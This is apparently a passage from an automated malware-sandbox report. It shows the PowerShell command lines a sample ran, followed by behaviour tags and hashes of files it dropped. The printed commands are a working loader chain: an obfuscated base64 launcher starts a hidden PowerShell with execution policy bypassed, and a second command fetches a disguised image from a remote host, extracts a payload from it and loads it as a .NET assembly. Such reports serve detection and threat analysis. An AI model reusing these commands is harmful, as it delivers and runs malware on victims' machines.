c♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmR2Z3k0Lzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59b43f21049d6aee97c69de4a96b6f2f5
SHA148427106761c359db6b8d4a202b82e21f9460fa4
SHA256b9524acd40bdb8bdf8f352ae52308c32f9d86d7b9256a38d39b3fedca9551a93
SHA5128269615d4ae38bcf50addc19c2632975b65e99e407fcbbf3dbee5bd157126f60d62510cd4dd4150183aed2482c315dd44dc4f53bd7aba14260560b3faf720934
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6AIZ09HAV64R2G1L44LI.temp
Filesize7KB
MD58e67ed64353ee085cf84477b2d3dda2d
SHA1c8fd52ff339408fbc4d7ff4dfe8d40dd4689a74a
SHA256fbcef2db7bc0b69b71b2afa2c2d11a1404ecc997e29095ea9b66db32a92dacf6
SHA512ef91c973a88313919bf83183fc335f1cdb4897c279604aabb6afe30b8d05640ee3885c9f5ed27641d83572ad66eb98422a42a0e27819e245edcaf496ad30af62
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD58e67ed64353ee085cf84477b2d3dda2d
SHA1c8fd52ff339408fbc4d7ff4dfe8d40dd4689a74a
SHA256fbcef2db7bc0b69b71b2afa2c2d11a1404ecc997e29095ea9b66db32a92dacf6
SHA512ef91c973a88313919bf83183fc335f1cdb4897c279604aabb6afe30b8d05640ee3885c9f5ed27641d83572ad66eb98422a42a0e27819e245edcaf496ad30af62
-
Filesize
37KB
MD5256cc022184324c3f5a002c7b6428703
SHA11c853c51bfd15222b552dc931bd91ed46d62fd21
SHA25659af2921c60ac2a2019c4906929a63cf815b2decbc1dca744b3ee365325f431d
SHA512f96c9e4bd5d62e33a6812d43c412c03c37e8023e8b79e8ca900898a5057369006bb329b7ef3ed8782de5e85c3bfac7a8cca1b96465f8d3cc33b81129ea27ec07
-
Filesize
37KB
MD5256cc022184324c3f5a002c7b6428703
SHA11c853c51bfd15222b552dc931bd91ed46d62fd21
SHA25659af2921c60ac2a2019c4906929a63cf815b2decbc1dca744b3ee365325f431d
SHA512f96c9e4bd5d62e33a6812d43c412c03c37e8023e8b79e8ca900898a5057369006bb329b7ef3ed8782de5e85c3bfac7a8cca1b96465f8d3cc33b81129ea27ec07